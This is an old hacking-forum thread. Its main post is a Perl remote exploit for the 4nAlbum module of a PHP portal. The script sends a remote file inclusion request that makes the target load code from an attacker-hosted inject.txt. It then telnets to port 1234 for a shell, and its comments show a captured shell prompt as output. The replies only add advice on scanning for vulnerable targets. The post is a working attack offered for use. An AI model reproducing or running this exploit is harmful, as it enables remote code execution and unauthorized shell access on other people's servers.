qcred11
May 6 2004, 03:10 PM
| QUOTE |
#!/usr/bin/perl -w
#
#-bash-2.05b$ perl 4nalb.pl -t 192.168.1.10 -d nuke
#Usage: perl 4nalb.pl -t <target> -d <directory>
#Remote Exploit 4nAlbum by adil@ccc.ma & alaa_eddine83@hotmail.com
#############################
# Moroccan Security Radar
# CCC MAROC 2004
#############################
#Target: 192.168.1.10
#Directory: nuke
#++++++++++++++++++++++++++++++++++++++++++++++++
#Vuln - Vuln - 3 - 2 - 1 ------
#connected
#Trying 192.168.1.10...
#Connected to 192.168.1.10.
#Escape character is '^]'.
#sh-2.05b$
require LWP::UserAgent;
use Getopt::Std;
getopts('t:d:');
our($opt_t, $opt_d);
my $target = $opt_t;
my $dir = $opt_d;
print "Usage: perl 4nalb.pl -t <target> -d <directory>\n\n";
print "Remote Exploit 4nAlbum by adil At ccc.ma & alaa_eddine83 At hotmail.com\n";
print "#############################\n";
print " Moroccan Security Radar\n";
print " CCC MAROC 2004 \n";
print "#############################\n";
print "Target: $target\n";
print "Directory: $dir\n";
my $ua = LWP::UserAgent->new;
$ua->agent("Linux");
$ua->timeout(10);
$ua->env_proxy;
$req = "http://$target/$dir/modules/4nAlbum/public/displayCategory.php?basepath=http://www.attaker.com/inject.txt?&cmd=";
my $response = $ua->get($req);
print "++++++++++++++++++++++++++++++++++++++++++++++++\n";
if ($response->is_success) {
print "Vuln - Vuln - 3 - 2 - 1 ------\n";
print "connected\n";
sleep(3);
exec("telnet $target 1234");
} else {
die $response->status_line;
}
print "++++++++++++++++++++++++++++++++++++++++++++++++++\n";
# EOF
|
totof
May 6 2004, 05:23 PM
wich port to scanned
Paul
May 6 2004, 05:50 PM
kill
T3cHn0b0y
May 6 2004, 07:59 PM
| QUOTE (totof @ May 6 2004, 05:23 PM) |
| wich port to scanned |
It's a php script vulnerability m8...get an url scanner...
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
